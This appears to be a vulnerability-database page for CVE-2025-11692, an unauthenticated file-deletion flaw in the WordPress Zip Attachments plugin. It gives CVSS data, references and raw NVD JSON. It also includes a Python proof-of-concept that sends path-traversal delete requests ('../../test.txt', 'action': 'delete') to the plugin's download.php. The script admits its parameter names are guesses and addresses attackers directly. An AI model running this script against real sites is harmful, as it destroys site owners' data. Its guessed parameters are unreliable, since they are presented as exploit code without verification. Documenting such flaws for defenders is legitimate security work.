CVE-2025-11692

Description

The Zip Attachments plugin for WordPress is vulnerable to unauthorized loss of data due to a missing authorization and capability checks on the download.php file in all versions up to, and including, 1.6. This makes it possible for unauthenticated attackers to delete arbitrary files from the current wp_upload_dir directory.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Zip Attachments Plugin <= 1.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11692 PoC - Zip Attachments Plugin Arbitrary File Deletion
# Vulnerability: Missing authorization in download.php
# Affected: Zip Attachments Plugin <= 1.6

import requests

# Target WordPress site
target_url = "http://target-wordpress-site.com"
# Path to the vulnerable download.php file
vulnerable_endpoint = "/wp-content/plugins/zip-attachments/download.php"

# File to delete (relative to wp_upload_dir)
file_to_delete = "../../test.txt"  # Example: delete a file in upload directory

# Construct the malicious request
# The download.php file accepts parameters for file operations
params = {
    "file": file_to_delete,
    "action": "delete"  # Action parameter to trigger deletion
}

# Send the exploit request without authentication
response = requests.get(
    target_url + vulnerable_endpoint,
    params=params,
    verify=False
)

print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

# Alternative: POST request variant
response_post = requests.post(
    target_url + vulnerable_endpoint,
    data=params,
    verify=False
)

print(f"POST Status Code: {response_post.status_code}")
print(f"POST Response: {response_post.text}")

# Note: The exact parameter names may vary based on the plugin version
# Attackers should analyze the download.php source code to identify
# the correct parameters for file deletion operations

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11692
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11692
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11692/
[4] VulDB https://vuldb.com/cve/CVE-2025-11692
[5] https://plugins.trac.wordpress.org/browser/zip-attachments/tags/1.6/download.php#L27
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/aa8d746f-82e2-4615-92bb-35d20124dc56?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11692", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:42.720", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Zip Attachments plugin for WordPress is vulnerable to unauthorized loss of data due to a missing authorization and capability checks on the download.php file in all versions up to, and including, 1.6. This makes it possible for unauthenticated attackers to delete arbitrary files from the current wp_upload_dir directory."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/zip-attachments/tags/1.6/download.php#L27", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aa8d746f-82e2-4615-92bb-35d20124dc56?source=cve", "source": "[email protected]"}]}}